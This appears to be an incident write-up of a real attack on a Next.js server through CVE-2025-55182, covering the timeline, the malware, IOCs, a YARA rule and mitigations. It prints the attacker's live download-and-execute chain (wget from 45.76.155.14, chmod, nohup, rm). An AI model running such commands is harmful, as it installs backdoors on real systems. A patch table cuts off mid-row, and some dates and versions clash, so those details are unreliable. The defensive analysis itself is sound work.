Share
## https://sploitus.com/exploit?id=9522054D-77D4-5B2D-BF07-F6FC62F206BE
# CVE-2025-55182 Attack Analysis: React Server Components RCE

> **Real-world attack analysis on a production Next.js application**

## ๐Ÿ“‹ Table of Contents

- [Executive Summary](#executive-summary)
- [Vulnerability Overview](#vulnerability-overview)
- [Attack Timeline](#attack-timeline)
- [Technical Analysis](#technical-analysis)
- [Malware Analysis](#malware-analysis)
- [Indicators of Compromise (IOCs)](#indicators-of-compromise-iocs)
- [Mitigation & Response](#mitigation--response)
- [Lessons Learned](#lessons-learned)
- [References](#references)

---

## Executive Summary

On **December 5, 2025**, our production Next.js application was targeted by attackers exploiting **CVE-2025-55182** (React2Shell), a critical Remote Code Execution vulnerability in React Server Components. The attack attempted to download and execute a Linux backdoor trojan on our server.

| Attribute | Value |
|-----------|-------|
| **CVE ID** | CVE-2025-55182 |
| **CVSS Score** | 9.8 (Critical) |
| **Attack Date** | December 5, 2025 |
| **Attack Outcome** | โœ… Blocked (post-patch) |
| **Malware Type** | Linux Backdoor Trojan |
| **Affected Stack** | Next.js + React Server Components |

---

## Vulnerability Overview

### What is CVE-2025-55182?

CVE-2025-55182, also known as **"React2Shell"**, is a critical Remote Code Execution (RCE) vulnerability affecting React Server Components (RSC) in:

- **React**: versions 19.0.0 - 19.1.0
- **Next.js**: versions 15.x and 16.x (before patches)

### Root Cause

The vulnerability exists in the `renderToReadableStream()` function within React's Flight Server. When processing specially crafted RSC payloads, the server fails to properly sanitize certain input, leading to arbitrary code execution.

### Attack Vector

```
Attacker โ†’ Malicious RSC Payload โ†’ Flight Server โ†’ eval() โ†’ RCE
```

The attacker sends a crafted POST request with a malicious serialized payload that gets deserialized and executed on the server.

---

## Attack Timeline

### Phase 1: Initial Exploitation Attempts (Pre-Patch)

| Timestamp (UTC) | Event |
|-----------------|-------|
| Dec 5, 06:20 | First attack detected via Sentry |
| Dec 5, 06:20 | Payload attempts to execute shell commands |
| Dec 5, 06:20 | Attack partially successful (pre-patch) |

**Sentry Error Log (Pre-Patch):**
```
Error: root
  at eval (eval at , :3:6)
  at nk (chunk.js)
  at JSON.parse ()
  at n5 (/app/node_modules/next/dist/server/app-render.js)
```

### Phase 2: Patch Deployment

| Timestamp | Action |
|-----------|--------|
| Dec 4, 14:13 | Upgraded to Next.js 16.0.7 |
| Dec 4, 14:13 | Deployed patched version (v1.0.0-beta-4) |

### Phase 3: Post-Patch Attack Blocked

| Timestamp (UTC) | Event |
|-----------------|-------|
| Dec 5, 08:48 | Attack attempt detected |
| Dec 5, 08:48 | **Payload execution BLOCKED** |
| Dec 5, 08:48 | Error: `syntax error: unexpected ";"` |

**Sentry Error Log (Post-Patch):**
```
Error: Command failed: wget http://45.76.155.14/vim -O /tmp/vim ; 
chmod +x /tmp/vim ; nohup /tmp/vim > /dev/null 2>&1 & ; rm -f /tmp/vim
/bin/sh: syntax error: unexpected ";"
```

The patch successfully prevented the malicious command from executing.

---

## Technical Analysis

### Attack Request Details

| Attribute | Value |
|-----------|-------|
| **Target URL** | `https://[REDACTED]/` |
| **Method** | POST |
| **User-Agent** | `Python Requests 2.31` |
| **Origin** | Automated attack script |

### Payload Analysis

The attacker attempted to execute the following command chain:

```bash
wget http://45.76.155.14/vim -O /tmp/vim ; \
chmod +x /tmp/vim ; \
nohup /tmp/vim > /dev/null 2>&1 & ; \
rm -f /tmp/vim
```

**Breakdown:**

| Step | Command | Purpose |
|------|---------|---------|
| 1 | `wget http://45.76.155.14/vim -O /tmp/vim` | Download malware |
| 2 | `chmod +x /tmp/vim` | Make executable |
| 3 | `nohup /tmp/vim > /dev/null 2>&1 &` | Run in background, persist after logout |
| 4 | `rm -f /tmp/vim` | Delete evidence |

### Server Environment

| Component | Version |
|-----------|---------|
| **OS** | Alpine Linux 3.23.0 |
| **Runtime** | Node.js v20.19.6 |
| **Framework** | Next.js 16.0.7 (patched) |
| **Container** | Docker |

---

## Malware Analysis

### File Information

| Attribute | Value |
|-----------|-------|
| **Filename** | `vim` (disguised as legitimate tool) |
| **SHA256** | `0f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce` |
| **File Type** | ELF 64-bit LSB executable, x86-64 |
| **Language** | Go (compiled binary) |
| **File Size** | ~4.7 MB |

### VirusTotal Results

**Detection Rate:** 13/72 (18%)

| Vendor | Detection Name |
|--------|----------------|
| DrWeb | `Linux.BackDoor.Siggen.389` |
| AhnLab-V3 | `Backdoor/Linux.Agent.4780032` |
| Kaspersky | `HEUR:Trojan.Linux.Agent.gen` |
| ESET-NOD32 | `Linux/Agent.PX Trojan` |
| Avast/AVG | `ELF:Agent-BQE [Trj]` |
| AliCloud | `Trojan:Linux/Agent.ff565f70` |
| Antiy-AVL | `Trojan/Linux.Agent.px` |
| Rising | `Trojan.Agent/Linux!8.13268` |
| SentinelOne | `Static AI - Suspicious ELF` |
| Tencent | `Malware.Linux.Generic.1c03c8b9` |
| Zillya | `Trojan.Agent.Linux.5292` |

**VirusTotal Link:** [View Analysis](https://www.virustotal.com/gui/file/0f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce)

### Binary Analysis

**ELF Header:**
```
00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 60e7 4500 0000 0000  ..>.....`.E.....
```

**Identified Capabilities:**

| Capability | Evidence |
|------------|----------|
| HTTP/HTTPS Client | `net/http`, `*http.Client` |
| TLS Encryption | `crypto/tls`, `crypto/aes` |
| SOCKS5 Proxy | `socks`, `socks5` |
| DNS Resolution | `net/dns/dnsmessage` |
| Strong Crypto | `chacha20poly1305`, `Ed25519` |

**Extracted Strings (Relevant):**
```
crypto/aes
crypto/tls
net/http
socks5
vendor/golang.org/x/crypto/chacha20poly1305
vendor/golang.org/x/net/http2/hpack
```

### IDS Rules Triggered

| Severity | Rule | Source |
|----------|------|--------|
| LOW | `ET POLICY HTTP traffic on port 443 (POST)` | Proofpoint ET Open |
| LOW | `ET DNS Query for .cc TLD` | Proofpoint ET Open |

### Malware Classification

**Type:** Linux Backdoor Trojan

**Capabilities:**
- Remote shell access
- Command & Control (C2) communication
- File upload/download
- Encrypted communications
- Traffic tunneling via SOCKS5
- Persistence mechanisms

---

## Indicators of Compromise (IOCs)

### Network IOCs

| Type | Value | Description |
|------|-------|-------------|
| **IP Address** | `45.76.155.14` | Malware distribution server |
| **URL** | `http://45.76.155.14/vim` | Malware download URL |
| **Hosting** | Vultr VPS | Cloud provider |
| **TLD** | `.cc` | C2 domain uses .cc TLD |

### File IOCs

| Type | Value |
|------|-------|
| **SHA256** | `0f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce` |
| **SHA1** | `[Calculate if needed]` |
| **MD5** | `[Calculate if needed]` |
| **Filename** | `vim` (disguised) |
| **File Type** | ELF 64-bit x86-64 |
| **File Size** | ~4.7 MB |

### Behavioral IOCs

| Indicator | Description |
|-----------|-------------|
| `wget` to external IP | Downloads from non-standard URLs |
| Files in `/tmp/` | Suspicious executable in temp directory |
| `nohup` + background execution | Persistence attempt |
| Immediate file deletion | Evidence cleanup |
| Python Requests User-Agent | Automated attack tool |

### YARA Rule

```yara
rule CVE_2025_55182_Backdoor {
    meta:
        description = "Detects backdoor distributed via CVE-2025-55182"
        author = "Security Researcher"
        date = "2025-12-05"
        hash = "0f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce"
    
    strings:
        $elf = { 7F 45 4C 46 }
        $go1 = "vendor/golang.org/x/crypto" ascii
        $go2 = "vendor/golang.org/x/net" ascii
        $net1 = "net/http" ascii
        $net2 = "socks5" ascii
        $crypto1 = "crypto/tls" ascii
        $crypto2 = "chacha20poly1305" ascii
    
    condition:
        $elf at 0 and
        (2 of ($go*)) and
        (1 of ($net*)) and
        (1 of ($crypto*))
}
```

---

## Mitigation & Response

### Immediate Actions Taken

| Action | Status | Details |
|--------|--------|---------|
| โœ… Upgrade Next.js | Complete | 16.0.4 โ†’ 16.0.7 |
| โœ… Upgrade React | Complete | 19.1.0 โ†’ 19.1.0 (patched) |
| โœ… Redeploy application | Complete | Docker rebuild |
| โœ… Analyze malware | Complete | VirusTotal submission |
| โœ… Report to hosting | Complete | Vultr abuse report sent |
| โณ Rotate credentials | Pending | Database, JWT, API keys |

### Abuse Report

An abuse report was submitted to Vultr (the hosting provider of the C2 server) on **December 5, 2025** containing:
- Malicious IP address and URL
- SHA256 hash of malware
- VirusTotal analysis link
- Description of attack vector (CVE-2025-55182)

### Patched Versions

| Package | Vulnerable | Patched |
|---------|------------|---------|
| Next.js | /dev/null

# Check for suspicious processes
ps aux | grep -E "(vim|/tmp/)"

# Check network connections
netstat -an | grep "45.76.155.14"
```

**4. Rotate all secrets:**
- Database credentials
- JWT secrets
- API keys
- Session secrets

---

## Lessons Learned

### What Went Well

1. **Sentry monitoring** caught the attack immediately
2. **Quick patch deployment** within hours of CVE disclosure
3. **Docker containerization** limited blast radius
4. **Post-patch protection** successfully blocked subsequent attacks

### What Could Be Improved

1. **Faster patching** - Reduce time between CVE disclosure and patch
2. **WAF rules** - Add rules to detect RSC exploitation attempts
3. **Egress filtering** - Block outbound connections to unknown IPs
4. **Automated alerts** - Set up alerts for suspicious shell commands

### Security Recommendations

| Category | Recommendation |
|----------|----------------|
| **Monitoring** | Implement real-time error monitoring (Sentry, etc.) |
| **Updates** | Subscribe to security advisories for all dependencies |
| **Network** | Implement egress filtering, block unnecessary outbound |
| **Containers** | Run as non-root, use read-only filesystems |
| **Secrets** | Rotate credentials regularly, use secrets manager |

---

## References

### Official Advisories

- [Next.js Security Advisory](https://github.com/vercel/next.js/security/advisories)
- [React Security Updates](https://react.dev/blog)
- [CVE-2025-55182 Details](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)

### Analysis Resources

- [VirusTotal Analysis](https://www.virustotal.com/gui/file/0f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce)
- [MalwareBazaar](https://bazaar.abuse.ch/)

### Tools Used

- [Sentry](https://sentry.io/) - Error monitoring
- [VirusTotal](https://www.virustotal.com/) - Malware analysis
- [Docker](https://www.docker.com/) - Containerization

---

## Disclaimer

This write-up is published for **educational and defensive purposes only**. The malware binary is not included in this repository. Security researchers can obtain the sample via VirusTotal using the SHA256 hash provided.

---

## Author

**Published:** December 5, 2025

**Contact:** [Your contact info or GitHub profile]

---

## License

This analysis is released under [CC BY 4.0](https://creativecommons.org/licenses/by/4.0/). You are free to share and adapt this material with appropriate attribution.

---

## Changelog

| Date | Version | Changes |
|------|---------|---------|
| 2025-12-05 | 1.0 | Initial publication |